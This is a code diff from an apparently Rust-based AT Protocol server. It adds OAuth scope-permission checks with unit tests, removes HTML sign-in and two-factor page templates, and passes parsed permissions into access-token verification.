coll.strip_suffix(".*").unwrap(); 126 + if collection.starts_with(prefix) 127 + && collection.chars().nth(prefix.len()) == Some('.') 128 + { 129 + return Ok(()); 130 + } 131 + } 132 + _ => {} 133 + } 134 + } 135 + 136 + Err(ScopeError::InsufficientScope { 137 + required: format!("repo:{}?action={}", collection, action_str(action)), 138 + message: format!( 139 + "Insufficient scope to {} records in {}", 140 + action_str(action), 141 + collection 142 + ), 143 + }) 144 + } 145 + 146 + pub fn assert_blob(&self, mime: &str) -> Result<(), ScopeError> { 147 + if self.has_atproto || self.has_transition_generic { 148 + return Ok(()); 149 + } 150 + 151 + for blob_scope in self.find_blob_scopes() { 152 + if blob_scope.matches_mime(mime) { 153 + return Ok(()); 154 + } 155 + } 156 + 157 + Err(ScopeError::InsufficientScope { 158 + required: format!("blob:{}", mime), 159 + message: format!("Insufficient scope to upload blob with mime type {}", mime), 160 + }) 161 + } 162 + 163 + pub fn assert_rpc(&self, aud: &str, lxm: &str) -> Result<(), ScopeError> { 164 + if self.has_atproto || self.has_transition_generic { 165 + return Ok(()); 166 + } 167 + 168 + if lxm.starts_with("chat.bsky.") && self.has_transition_chat { 169 + return Ok(()); 170 + } 171 + 172 + for rpc_scope in self.find_rpc_scopes() { 173 + let lxm_matches = match &rpc_scope.lxm { 174 + None => true, 175 + Some(scope_lxm) if scope_lxm == lxm => true, 176 + Some(scope_lxm) if scope_lxm.ends_with(".*") => { 177 + let prefix = scope_lxm.strip_suffix(".*").unwrap(); 178 + lxm.starts_with(prefix) && lxm.chars().nth(prefix.len()) == Some('.') 179 + } 180 + _ => false, 181 + }; 182 + 183 + let aud_matches = match &rpc_scope.aud { 184 + None => true, 185 + Some(scope_aud) if scope_aud == "*" => true, 186 + Some(scope_aud) => scope_aud == aud, 187 + }; 188 + 189 + if lxm_matches && aud_matches { 190 + return Ok(()); 191 + } 192 + } 193 + 194 + Err(ScopeError::InsufficientScope { 195 + required: format!("rpc:{}?aud={}", lxm, aud), 196 + message: format!("Insufficient scope to call {} on {}", lxm, aud), 197 + }) 198 + } 199 + 200 + pub fn assert_account( 201 + &self, 202 + attr: AccountAttr, 203 + action: AccountAction, 204 + ) -> Result<(), ScopeError> { 205 + if self.has_atproto || self.has_transition_generic { 206 + return Ok(()); 207 + } 208 + 209 + if attr == AccountAttr::Email && action == AccountAction::Read && self.has_transition_email 210 + { 211 + return Ok(()); 212 + } 213 + 214 + for account_scope in self.find_account_scopes() { 215 + if account_scope.attr == attr && account_scope.action == action { 216 + return Ok(()); 217 + } 218 + if account_scope.attr == attr && account_scope.action == AccountAction::Manage { 219 + return Ok(()); 220 + } 221 + } 222 + 223 + Err(ScopeError::InsufficientScope { 224 + required: format!( 225 + "account:{}?action={}", 226 + attr_str(attr), 227 + action_str_account(action) 228 + ), 229 + message: format!( 230 + "Insufficient scope to {} account {}", 231 + action_str_account(action), 232 + attr_str(attr) 233 + ), 234 + }) 235 + } 236 + 237 + pub fn allows_email_read(&self) -> bool { 238 + self.has_atproto 239 + || self.has_transition_generic 240 + || self.has_transition_email 241 + || self 242 + .find_account_scopes() 243 + .any(|a| a.attr == AccountAttr::Email) 244 + } 245 + 246 + pub fn allows_repo(&self, action: RepoAction, collection: &str) -> bool { 247 + self.assert_repo(action, collection).is_ok() 248 + } 249 + 250 + pub fn allows_blob(&self, mime: &str) -> bool { 251 + self.assert_blob(mime).is_ok() 252 + } 253 + 254 + pub fn allows_rpc(&self, aud: &str, lxm: &str) -> bool { 255 + self.assert_rpc(aud, lxm).is_ok() 256 + } 257 + 258 + pub fn allows_account(&self, attr: AccountAttr, action: AccountAction) -> bool { 259 + self.assert_account(attr, action).is_ok() 260 + } 261 + 262 + pub fn assert_identity(&self, attr: IdentityAttr) -> Result<(), ScopeError> { 263 + if self.has_atproto || self.has_transition_generic { 264 + return Ok(()); 265 + } 266 + 267 + for identity_scope in self.find_identity_scopes() { 268 + if identity_scope.attr == IdentityAttr::Wildcard { 269 + return Ok(()); 270 + } 271 + if identity_scope.attr == attr { 272 + return Ok(()); 273 + } 274 + } 275 + 276 + Err(ScopeError::InsufficientScope { 277 + required: format!("identity:{}", identity_attr_str(attr)), 278 + message: format!( 279 + "Insufficient scope to modify identity {}", 280 + identity_attr_str(attr) 281 + ), 282 + }) 283 + } 284 + 285 + pub fn allows_identity(&self, attr: IdentityAttr) -> bool { 286 + self.assert_identity(attr).is_ok() 287 + } 288 + } 289 + 290 + fn action_str(action: RepoAction) -> &'static str { 291 + match action { 292 + RepoAction::Create => "create", 293 + RepoAction::Update => "update", 294 + RepoAction::Delete => "delete", 295 + } 296 + } 297 + 298 + fn attr_str(attr: AccountAttr) -> &'static str { 299 + match attr { 300 + AccountAttr::Email => "email", 301 + AccountAttr::Handle => "handle", 302 + AccountAttr::Repo => "repo", 303 + AccountAttr::Status => "status", 304 + } 305 + } 306 + 307 + fn identity_attr_str(attr: IdentityAttr) -> &'static str { 308 + match attr { 309 + IdentityAttr::Handle => "handle", 310 + IdentityAttr::Wildcard => "*", 311 + } 312 + } 313 + 314 + fn action_str_account(action: AccountAction) -> &'static str { 315 + match action { 316 + AccountAction::Read => "read", 317 + AccountAction::Manage => "manage", 318 + } 319 + } 320 + 321 + impl Default for ScopePermissions { 322 + fn default() -> Self { 323 + Self::from_scope_string(Some("atproto")) 324 + } 325 + } 326 + 327 + #[cfg(test)] 328 + mod tests { 329 + use super::*; 330 + 331 + #[test] 332 + fn test_atproto_scope_allows_everything() { 333 + let perms = ScopePermissions::from_scope_string(Some("atproto")); 334 + assert!(perms.has_full_access()); 335 + assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 336 + assert!(perms.allows_blob("image/png")); 337 + assert!(perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline")); 338 + assert!(perms.allows_account(AccountAttr::Email, AccountAction::Manage)); 339 + } 340 + 341 + #[test] 342 + fn test_transition_generic_allows_everything() { 343 + let perms = ScopePermissions::from_scope_string(Some("transition:generic")); 344 + assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 345 + assert!(perms.allows_blob("image/png")); 346 + } 347 + 348 + #[test] 349 + fn test_transition_chat_only_allows_chat() { 350 + let perms = ScopePermissions::from_scope_string(Some("transition:chat.bsky")); 351 + assert!(!perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 352 + assert!(perms.allows_rpc("did:web:api.bsky.app", "chat.bsky.convo.getMessages")); 353 + assert!(!perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline")); 354 + } 355 + 356 + #[test] 357 + fn test_empty_scope_defaults_to_atproto() { 358 + let perms = ScopePermissions::from_scope_string(None); 359 + assert!(perms.has_full_access()); 360 + } 361 + 362 + #[test] 363 + fn test_multiple_scopes() { 364 + let perms = ScopePermissions::from_scope_string(Some("atproto transition:chat.bsky")); 365 + assert!(perms.has_scope("atproto")); 366 + assert!(perms.has_scope("transition:chat.bsky")); 367 + assert!(!perms.has_scope("transition:generic")); 368 + } 369 + 370 + #[test] 371 + fn test_transition_email_allows_email_read() { 372 + let perms = ScopePermissions::from_scope_string(Some("transition:email")); 373 + assert!(perms.allows_email_read()); 374 + assert!(perms.allows_account(AccountAttr::Email, AccountAction::Read)); 375 + assert!(!perms.allows_account(AccountAttr::Email, AccountAction::Manage)); 376 + assert!(!perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 377 + } 378 + 379 + #[test] 380 + fn test_granular_repo_wildcard() { 381 + let perms = 382 + ScopePermissions::from_scope_string(Some("atproto repo:*?action=create blob:*/*")); 383 + assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 384 + assert!(perms.allows_repo(RepoAction::Create, "any.collection")); 385 + assert!(perms.allows_blob("image/png")); 386 + } 387 + 388 + #[test] 389 + fn test_granular_repo_collection_specific() { 390 + let perms = ScopePermissions::from_scope_string(Some( 391 + "repo:app.bsky.feed.post?action=create&action=delete", 392 + )); 393 + assert!(perms.allows_repo(RepoAction::Create, "app.bsky.feed.post")); 394 + assert!(perms.allows_repo(RepoAction::Delete, "app.bsky.feed.post")); 395 + assert!(!perms.allows_repo(RepoAction::Update, "app.bsky.feed.post")); 396 + assert!(!perms.allows_repo(RepoAction::Create, "app.bsky.feed.like")); 397 + } 398 + 399 + #[test] 400 + fn test_granular_blob_specific_mime() { 401 + let perms = ScopePermissions::from_scope_string(Some("blob?accept=image/*&accept=video/*")); 402 + assert!(perms.allows_blob("image/png")); 403 + assert!(perms.allows_blob("image/jpeg")); 404 + assert!(perms.allows_blob("video/mp4")); 405 + assert!(!perms.allows_blob("text/plain")); 406 + assert!(!perms.allows_blob("application/json")); 407 + } 408 + 409 + #[test] 410 + fn test_granular_rpc() { 411 + let perms = ScopePermissions::from_scope_string(Some( 412 + "rpc:app.bsky.feed.getTimeline?aud=did:web:api.bsky.app", 413 + )); 414 + assert!(perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline")); 415 + assert!(!perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getAuthorFeed")); 416 + assert!(!perms.allows_rpc("did:web:other.service", "app.bsky.feed.getTimeline")); 417 + } 418 + 419 + #[test] 420 + fn test_granular_rpc_wildcard_aud() { 421 + let perms = 422 + ScopePermissions::from_scope_string(Some("rpc:app.bsky.feed.getTimeline?aud=*")); 423 + assert!(perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getTimeline")); 424 + assert!(perms.allows_rpc("did:web:any.service", "app.bsky.feed.getTimeline")); 425 + assert!(!perms.allows_rpc("did:web:api.bsky.app", "app.bsky.feed.getAuthorFeed")); 426 + } 427 + 428 + #[test] 429 + fn test_granular_account() { 430 + let perms = ScopePermissions::from_scope_string(Some("account:email?action=read")); 431 + assert!(perms.allows_account(AccountAttr::Email, AccountAction::Read)); 432 + assert!(!perms.allows_account(AccountAttr::Email, AccountAction::Manage)); 433 + assert!(!perms.allows_account(AccountAttr::Handle, AccountAction::Read)); 434 + 435 + let perms2 = ScopePermissions::from_scope_string(Some("account:repo?action=manage")); 436 + assert!(perms2.allows_account(AccountAttr::Repo, AccountAction::Manage)); 437 + assert!(perms2.allows_account(AccountAttr::Repo, AccountAction::Read)); 438 + } 439 + 440 + #[test] 441 + fn test_granular_scopes_without_atproto() { 442 + let perms = ScopePermissions::from_scope_string(Some("repo:*?action=create")); 443 + assert!(!perms.has_full_access()); 444 + assert!(perms.allows_repo(RepoAction::Create, "any.collection")); 445 + assert!(!perms.allows_repo(RepoAction::Update, "any.collection")); 446 + assert!(!perms.allows_repo(RepoAction::Delete, "any.collection")); 447 + } 448 + 449 + #[test] 450 + fn test_pdsls_style_scopes() { 451 + let perms = ScopePermissions::from_scope_string(Some( 452 + "atproto repo:*?action=create repo:*?action=update repo:*?action=delete blob:*/*", 453 + )); 454 + assert!(perms.allows_repo(RepoAction::Create, "any.collection")); 455 + assert!(perms.allows_repo(RepoAction::Update, "any.collection")); 456 + assert!(perms.allows_repo(RepoAction::Delete, "any.collection")); 457 + assert!(perms.allows_blob("image/png")); 458 + assert!(perms.allows_blob("video/mp4")); 459 + } 460 + 461 + #[test] 462 + fn test_identity_scope_handle() { 463 + let perms = ScopePermissions::from_scope_string(Some("identity:handle")); 464 + assert!(perms.allows_identity(IdentityAttr::Handle)); 465 + assert!(!perms.allows_identity(IdentityAttr::Wildcard)); 466 + } 467 + 468 + #[test] 469 + fn test_identity_scope_wildcard() { 470 + let perms = ScopePermissions::from_scope_string(Some("identity:*")); 471 + assert!(perms.allows_identity(IdentityAttr::Handle)); 472 + assert!(perms.allows_identity(IdentityAttr::Wildcard)); 473 + } 474 + 475 + #[test] 476 + fn test_identity_scope_with_atproto() { 477 + let perms = ScopePermissions::from_scope_string(Some("atproto")); 478 + assert!(perms.allows_identity(IdentityAttr::Handle)); 479 + assert!(perms.allows_identity(IdentityAttr::Wildcard)); 480 + } 481 + 482 + #[test] 483 + fn test_account_status_scope() { 484 + let perms = ScopePermissions::from_scope_string(Some("account:status?action=read")); 485 + assert!(perms.allows_account(AccountAttr::Status, AccountAction::Read)); 486 + assert!(!perms.allows_account(AccountAttr::Status, AccountAction::Manage)); 487 + } 488 + }
-595
src/oauth/templates.rs
··· 1 - use chrono::{DateTime, Utc}; 2 - 3 - fn format_scope_for_display(scope: Option<&str>) -> String { 4 - let scope = scope.unwrap_or(""); 5 - if scope.is_empty() || scope.contains("atproto") || scope.contains("transition:generic") { 6 - return "access your account".to_string(); 7 - } 8 - let parts: Vec<&str> = scope.split_whitespace().collect(); 9 - let friendly: Vec<&str> = parts 10 - .iter() 11 - .filter_map(|s| { 12 - match *s { 13 - "atproto" | "transition:generic" | "transition:chat.bsky" => None, 14 - "read" => Some("read your data"), 15 - "write" => Some("write data"), 16 - other => Some(other), 17 - } 18 - }) 19 - .collect(); 20 - if friendly.is_empty() { 21 - "access your account".to_string() 22 - } else { 23 - friendly.join(", ") 24 - } 25 - } 26 - 27 - fn base_styles() -> &'static str { 28 - r#" 29 - :root { 30 - --bg-primary: #fafafa; 31 - --bg-secondary: #f9f9f9; 32 - --bg-card: #ffffff; 33 - --bg-input: #ffffff; 34 - --text-primary: #333333; 35 - --text-secondary: #666666; 36 - --text-muted: #999999; 37 - --border-color: #dddddd; 38 - --border-color-light: #cccccc; 39 - --accent: #0066cc; 40 - --accent-hover: #0052a3; 41 - --success-bg: #dfd; 42 - --success-border: #8c8; 43 - --success-text: #060; 44 - --error-bg: #fee; 45 - --error-border: #fcc; 46 - --error-text: #c00; 47 - } 48 - @media (prefers-color-scheme: dark) { 49 - :root { 50 - --bg-primary: #1a1a1a; 51 - --bg-secondary: #242424; 52 - --bg-card: #2a2a2a; 53 - --bg-input: #333333; 54 - --text-primary: #e0e0e0; 55 - --text-secondary: #a0a0a0; 56 - --text-muted: #707070; 57 - --border-color: #404040; 58 - --border-color-light: #505050; 59 - --accent: #4da6ff; 60 - --accent-hover: #7abbff; 61 - --success-bg: #1a3d1a; 62 - --success-border: #2d5a2d; 63 - --success-text: #7bc67b; 64 - --error-bg: #3d1a1a; 65 - --error-border: #5a2d2d; 66 - --error-text: #ff7b7b; 67 - } 68 - } 69 - * { 70 - box-sizing: border-box; 71 - margin: 0; 72 - padding: 0; 73 - } 74 - body { 75 - font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; 76 - background: var(--bg-primary); 77 - color: var(--text-primary); 78 - min-height: 100vh; 79 - line-height: 1.5; 80 - } 81 - .container { 82 - max-width: 400px; 83 - margin: 4rem auto; 84 - padding: 2rem; 85 - } 86 - h1 { 87 - margin: 0 0 0.5rem 0; 88 - font-weight: 600; 89 - } 90 - .subtitle { 91 - color: var(--text-secondary); 92 - margin: 0 0 2rem 0; 93 - } 94 - .subtitle strong { 95 - color: var(--text-primary); 96 - } 97 - .client-info { 98 - background: var(--bg-secondary); 99 - border: 1px solid var(--border-color); 100 - border-radius: 8px; 101 - padding: 1rem; 102 - margin-bottom: 1.5rem; 103 - } 104 - .client-info .client-name { 105 - font-weight: 500; 106 - color: var(--text-primary); 107 - display: block; 108 - margin-bottom: 0.25rem; 109 - } 110 - .client-info .scope { 111 - color: var(--text-secondary); 112 - font-size: 0.875rem; 113 - } 114 - .error-banner { 115 - background: var(--error-bg); 116 - border: 1px solid var(--error-border); 117 - color: var(--error-text); 118 - border-radius: 4px; 119 - padding: 0.75rem; 120 - margin-bottom: 1rem; 121 - } 122 - .form-group { 123 - margin-bottom: 1rem; 124 - } 125 - label { 126 - display: block; 127 - font-size: 0.875rem; 128 - font-weight: 500; 129 - margin-bottom: 0.25rem; 130 - } 131 - input[type="text"], 132 - input[type="email"], 133 - input[type="password"] { 134 - width: 100%; 135 - padding: 0.75rem; 136 - border: 1px solid var(--border-color-light); 137 - border-radius: 4px; 138 - font-size: 1rem; 139 - color: var(--text-primary); 140 - background: var(--bg-input); 141 - } 142 - input[type="text"]:focus, 143 - input[type="email"]:focus, 144 - input[type="password"]:focus { 145 - outline: none; 146 - border-color: var(--accent); 147 - } 148 - input[type="text"]::placeholder, 149 - input[type="email"]::placeholder, 150 - input[type="password"]::placeholder { 151 - color: var(--text-muted); 152 - } 153 - .checkbox-group { 154 - display: flex; 155 - align-items: center; 156 - gap: 0.5rem; 157 - margin-bottom: 1.5rem; 158 - } 159 - .checkbox-group input[type="checkbox"] { 160 - width: 1rem; 161 - height: 1rem; 162 - accent-color: var(--accent); 163 - } 164 - .checkbox-group label { 165 - margin-bottom: 0; 166 - font-weight: normal; 167 - color: var(--text-secondary); 168 - cursor: pointer; 169 - } 170 - .buttons { 171 - display: flex; 172 - gap: 0.75rem; 173 - } 174 - .btn { 175 - flex: 1; 176 - padding: 0.75rem; 177 - border-radius: 4px; 178 - font-size: 1rem; 179 - cursor: pointer; 180 - border: none; 181 - text-align: center; 182 - text-decoration: none; 183 - } 184 - .btn-primary { 185 - background: var(--accent); 186 - color: white; 187 - } 188 - .btn-primary:hover { 189 - background: var(--accent-hover); 190 - } 191 - .btn-primary:disabled { 192 - opacity: 0.6; 193 - cursor: not-allowed; 194 - } 195 - .btn-secondary { 196 - background: transparent; 197 - color: var(--accent); 198 - border: 1px solid var(--accent); 199 - } 200 - .btn-secondary:hover { 201 - background: var(--accent); 202 - color: white; 203 - } 204 - .footer { 205 - text-align: center; 206 - margin-top: 1.5rem; 207 - font-size: 0.75rem; 208 - color: var(--text-muted); 209 - } 210 - .accounts { 211 - display: flex; 212 - flex-direction: column; 213 - gap: 0.5rem; 214 - margin-bottom: 1rem; 215 - } 216 - .account-item { 217 - display: flex; 218 - align-items: center; 219 - justify-content: space-between; 220 - width: 100%; 221 - padding: 1rem; 222 - background: var(--bg-card); 223 - border: 1px solid var(--border-color); 224 - border-radius: 8px; 225 - cursor: pointer; 226 - transition: border-color 0.15s, box-shadow 0.15s; 227 - text-align: left; 228 - } 229 - .account-item:hover { 230 - border-color: var(--accent); 231 - box-shadow: 0 2px 8px rgba(77, 166, 255, 0.15); 232 - } 233 - .account-info { 234 - display: flex; 235 - flex-direction: column; 236 - gap: 0.25rem; 237 - flex: 1; 238 - min-width: 0; 239 - } 240 - .account-info .handle { 241 - font-weight: 500; 242 - color: var(--text-primary); 243 - overflow: hidden; 244 - text-overflow: ellipsis; 245 - white-space: nowrap; 246 - } 247 - .account-info .did { 248 - font-size: 0.75rem; 249 - color: var(--text-muted); 250 - font-family: monospace; 251 - overflow: hidden; 252 - text-overflow: ellipsis; 253 - } 254 - .chevron { 255 - color: var(--text-muted); 256 - font-size: 1.25rem; 257 - flex-shrink: 0; 258 - margin-left: 0.5rem; 259 - } 260 - .divider { 261 - height: 1px; 262 - background: var(--border-color); 263 - margin: 1rem 0; 264 - } 265 - .new-account-link { 266 - display: block; 267 - text-align: center; 268 - color: var(--accent); 269 - text-decoration: none; 270 - font-size: 0.875rem; 271 - } 272 - .new-account-link:hover { 273 - text-decoration: underline; 274 - } 275 - .help-text { 276 - text-align: center; 277 - margin-top: 1rem; 278 - font-size: 0.875rem; 279 - color: var(--text-secondary); 280 - } 281 - .icon { 282 - font-size: 3rem; 283 - margin-bottom: 1rem; 284 - } 285 - .error-code { 286 - background: var(--error-bg); 287 - border: 1px solid var(--error-border); 288 - color: var(--error-text); 289 - padding: 0.5rem 1rem; 290 - border-radius: 4px; 291 - font-family: monospace; 292 - display: inline-block; 293 - margin-bottom: 1rem; 294 - } 295 - .success-icon { 296 - width: 3rem; 297 - height: 3rem; 298 - border-radius: 50%; 299 - background: var(--success-bg); 300 - border: 1px solid var(--success-border); 301 - color: var(--success-text); 302 - display: flex; 303 - align-items: center; 304 - justify-content: center; 305 - font-size: 1.5rem; 306 - margin: 0 auto 1rem; 307 - } 308 - .text-center { 309 - text-align: center; 310 - } 311 - .code-input { 312 - letter-spacing: 0.5em; 313 - text-align: center; 314 - font-size: 1.5rem; 315 - font-family: monospace; 316 - } 317 - "# 318 - } 319 - 320 - pub fn login_page( 321 - client_id: &str, 322 - client_name: Option<&str>, 323 - scope: Option<&str>, 324 - request_uri: &str, 325 - error_message: Option<&str>, 326 - login_hint: Option<&str>, 327 - ) -> String { 328 - let client_display = client_name.unwrap_or(client_id); 329 - let scope_display = format_scope_for_display(scope); 330 - let error_html = error_message 331 - .map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg))) 332 - .unwrap_or_default(); 333 - let login_hint_value = login_hint.unwrap_or(""); 334 - format!( 335 - r#"<!DOCTYPE html> 336 - <html lang="en"> 337 - <head> 338 - <meta charset="UTF-8"> 339 - <meta name="viewport" content="width=device-width, initial-scale=1.0"> 340 - <meta name="robots" content="noindex"> 341 - <title>Sign in</title> 342 - <style>{styles}</style> 343 - </head> 344 - <body> 345 - <div class="container"> 346 - <h1>Sign In</h1> 347 - <p class="subtitle">Sign in to continue to <strong>{client_display}</strong></p> 348 - <div class="client-info"> 349 - <span class="client-name">{client_display}</span> 350 - <span class="scope">wants to {scope_display}</span> 351 - </div> 352 - {error_html} 353 - <form method="POST" action="/oauth/authorize"> 354 - <input type="hidden" name="request_uri" value="{request_uri}"> 355 - <div class="form-group"> 356 - <label for="username">Handle</label> 357 - <input type="text" id="username" name="username" value="{login_hint_value}" 358 - required autocomplete="username" autofocus 359 - placeholder="your.handle"> 360 - </div> 361 - <div class="form-group"> 362 - <label for="password">Password</label> 363 - <input type="password" id="password" name="password" required 364 - autocomplete="current-password" placeholder="Enter your password"> 365 - </div> 366 - <div class="checkbox-group"> 367 - <input type="checkbox" id="remember_device" name="remember_device" value="true"> 368 - <label for="remember_device">Remember this device</label> 369 - </div> 370 - <div class="buttons"> 371 - <button type="submit" class="btn btn-primary">Sign In</button> 372 - <button type="submit" formaction="/oauth/authorize/deny" formnovalidate class="btn btn-secondary">Cancel</button> 373 - </div> 374 - </form> 375 - <p class="help-text"> 376 - By signing in, you agree to share your account information with this application. 377 - </p> 378 - </div> 379 - </body> 380 - </html>"#, 381 - styles = base_styles(), 382 - client_display = html_escape(client_display), 383 - scope_display = html_escape(&scope_display), 384 - request_uri = html_escape(request_uri), 385 - error_html = error_html, 386 - login_hint_value = html_escape(login_hint_value), 387 - ) 388 - } 389 - 390 - pub struct DeviceAccount { 391 - pub did: String, 392 - pub handle: String, 393 - pub email: Option<String>, 394 - pub last_used_at: DateTime<Utc>, 395 - } 396 - 397 - pub fn account_selector_page( 398 - client_id: &str, 399 - client_name: Option<&str>, 400 - request_uri: &str, 401 - accounts: &[DeviceAccount], 402 - ) -> String { 403 - let client_display = client_name.unwrap_or(client_id); 404 - let accounts_html: String = accounts 405 - .iter() 406 - .map(|account| { 407 - format!( 408 - r#"<form method="POST" action="/oauth/authorize/select" style="margin:0"> 409 - <input type="hidden" name="request_uri" value="{request_uri}"> 410 - <input type="hidden" name="did" value="{did}"> 411 - <button type="submit" class="account-item"> 412 - <div class="account-info"> 413 - <span class="handle">@{handle}</span> 414 - <span class="did">{did}</span> 415 - </div> 416 - <span class="chevron">›</span> 417 - </button> 418 - </form>"#, 419 - request_uri = html_escape(request_uri), 420 - did = html_escape(&account.did), 421 - handle = html_escape(&account.handle), 422 - ) 423 - }) 424 - .collect(); 425 - format!( 426 - r#"<!DOCTYPE html> 427 - <html lang="en"> 428 - <head> 429 - <meta charset="UTF-8"> 430 - <meta name="viewport" content="width=device-width, initial-scale=1.0"> 431 - <meta name="robots" content="noindex"> 432 - <title>Choose an account</title> 433 - <style>{styles}</style> 434 - </head> 435 - <body> 436 - <div class="container"> 437 - <h1>Sign In</h1> 438 - <p class="subtitle">Choose an account to continue to <strong>{client_display}</strong></p> 439 - <div class="accounts"> 440 - {accounts_html} 441 - </div> 442 - <div class="divider"></div> 443 - <a href="/oauth/authorize?request_uri={request_uri_encoded}&new_account=true" class="new-account-link"> 444 - Sign in to another account 445 - </a> 446 - </div> 447 - </body> 448 - </html>"#, 449 - styles = base_styles(), 450 - client_display = html_escape(client_display), 451 - accounts_html = accounts_html, 452 - request_uri_encoded = urlencoding::encode(request_uri), 453 - ) 454 - } 455 - 456 - pub fn two_factor_page(request_uri: &str, channel: &str, error_message: Option<&str>) -> String { 457 - let error_html = error_message 458 - .map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg))) 459 - .unwrap_or_default(); 460 - let (title, subtitle) = match channel { 461 - "email" => ( 462 - "Check Your Email", 463 - "We sent a verification code to your email", 464 - ), 465 - "Discord" => ( 466 - "Check Discord", 467 - "We sent a verification code to your Discord", 468 - ), 469 - "Telegram" => ( 470 - "Check Telegram", 471 - "We sent a verification code to your Telegram", 472 - ), 473 - "Signal" => ("Check Signal", "We sent a verification code to your Signal"), 474 - _ => ("Check Your Messages", "We sent you a verification code"), 475 - }; 476 - format!( 477 - r#"<!DOCTYPE html> 478 - <html lang="en"> 479 - <head> 480 - <meta charset="UTF-8"> 481 - <meta name="viewport" content="width=device-width, initial-scale=1.0"> 482 - <meta name="robots" content="noindex"> 483 - <title>Verify your identity</title> 484 - <style>{styles}</style> 485 - </head> 486 - <body> 487 - <div class="container"> 488 - <h1>{title}</h1> 489 - <p class="subtitle">{subtitle}</p> 490 - {error_html} 491 - <form method="POST" action="/oauth/authorize/2fa"> 492 - <input type="hidden" name="request_uri" value="{request_uri}"> 493 - <div class="form-group"> 494 - <label for="code">Verification Code</label> 495 - <input type="text" id="code" name="code" class="code-input" 496 - placeholder="000000" 497 - pattern="[0-9]{{6}}" maxlength="6" 498 - inputmode="numeric" autocomplete="one-time-code" 499 - autofocus required> 500 - </div> 501 - <button type="submit" class="btn btn-primary" style="width:100%">Verify</button> 502 - </form> 503 - <p class="help-text"> 504 - Code expires in 10 minutes. 505 - </p> 506 - </div> 507 - </body> 508 - </html>"#, 509 - styles = base_styles(), 510 - title = title, 511 - subtitle = subtitle, 512 - request_uri = html_escape(request_uri), 513 - error_html = error_html, 514 - ) 515 - } 516 - 517 - pub fn error_page(error: &str, error_description: Option<&str>) -> String { 518 - let description = 519 - error_description.unwrap_or("An error occurred during the authorization process."); 520 - format!( 521 - r#"<!DOCTYPE html> 522 - <html lang="en"> 523 - <head> 524 - <meta charset="UTF-8"> 525 - <meta name="viewport" content="width=device-width, initial-scale=1.0"> 526 - <meta name="robots" content="noindex"> 527 - <title>Authorization Error</title> 528 - <style>{styles}</style> 529 - </head> 530 - <body> 531 - <div class="container text-center"> 532 - <h1>Authorization Failed</h1> 533 - <div class="error-code">{error}</div> 534 - <p class="subtitle" style="margin-bottom:0">{description}</p> 535 - <div style="margin-top:1.5rem"> 536 - <button onclick="window.close()" class="btn btn-secondary" style="width:100%">Close this window</button> 537 - </div> 538 - </div> 539 - </body> 540 - </html>"#, 541 - styles = base_styles(), 542 - error = html_escape(error), 543 - description = html_escape(description), 544 - ) 545 - } 546 - 547 - pub fn success_page(client_name: Option<&str>) -> String { 548 - let client_display = client_name.unwrap_or("The application"); 549 - format!( 550 - r#"<!DOCTYPE html> 551 - <html lang="en"> 552 - <head> 553 - <meta charset="UTF-8"> 554 - <meta name="viewport" content="width=device-width, initial-scale=1.0"> 555 - <meta name="robots" content="noindex"> 556 - <title>Authorization Successful</title> 557 - <style>{styles}</style> 558 - </head> 559 - <body> 560 - <div class="container text-center"> 561 - <div class="success-icon">✓</div> 562 - <h1 style="color:var(--success-text)">Authorization Successful</h1> 563 - <p class="subtitle">{client_display} has been granted access to your account.</p> 564 - <p class="help-text">You can close this window and return to the application.</p> 565 - </div> 566 - </body> 567 - </html>"#, 568 - styles = base_styles(), 569 - client_display = html_escape(client_display), 570 - ) 571 - } 572 - 573 - fn html_escape(s: &str) -> String { 574 - s.replace('&', "&amp;") 575 - .replace('<', "&lt;") 576 - .replace('>', "&gt;") 577 - .replace('"', "&quot;") 578 - .replace('\'', "&#39;") 579 - } 580 - 581 - pub fn mask_email(email: &str) -> String { 582 - if let Some(at_pos) = email.find('@') { 583 - let local = &email[..at_pos]; 584 - let domain = &email[at_pos..]; 585 - if local.len() <= 2 { 586 - format!("{}***{}", local.chars().next().unwrap_or('*'), domain) 587 - } else { 588 - let first = local.chars().next().unwrap_or('*'); 589 - let last = local.chars().last().unwrap_or('*'); 590 - format!("{}***{}{}", first, last, domain) 591 - } 592 - } else { 593 - "***".to_string() 594 - } 595 - }
+1
src/oauth/types.rs
··· 91 91 pub state: Option<String>, 92 92 pub code_challenge: String, 93 93 pub code_challenge_method: String, 94 + pub response_mode: Option<String>, 94 95 pub login_hint: Option<String>, 95 96 pub dpop_jkt: Option<String>, 96 97 #[serde(flatten)]
+13 -6
src/oauth/verify.rs
··· 14 14 use super::OAuthError; 15 15 use super::db; 16 16 use super::dpop::DPoPVerifier; 17 + use super::scopes::ScopePermissions; 17 18 use crate::config::AuthConfig; 18 19 use crate::state::AppState; 19 20 ··· 175 176 pub client_id: Option<String>, 176 177 pub scope: Option<String>, 177 178 pub is_oauth: bool, 179 + pub permissions: ScopePermissions, 178 180 } 179 181 180 182 pub struct OAuthAuthError { ··· 244 246 client_id: None, 245 247 scope: None, 246 248 is_oauth: false, 249 + permissions: ScopePermissions::default(), 247 250 }); 248 251 } 249 252 let http_method = parts.method.as_str(); 250 253 let http_uri = parts.uri.to_string(); 251 254 match verify_oauth_access_token(&state.db, token, dpop_proof, http_method, &http_uri).await 252 255 { 253 - Ok(result) => Ok(OAuthUser { 254 - did: result.did, 255 - client_id: Some(result.client_id), 256 - scope: result.scope, 257 - is_oauth: true, 258 - }), 256 + Ok(result) => { 257 + let permissions = ScopePermissions::from_scope_string(result.scope.as_deref()); 258 + Ok(OAuthUser { 259 + did: result.did, 260 + client_id: Some(result.client_id), 261 + scope: result.scope, 262 + is_oauth: true, 263 + permissions, 264 + }) 265 + } 259 266 Err(OAuthError::UseDpopNonce(nonce)) => 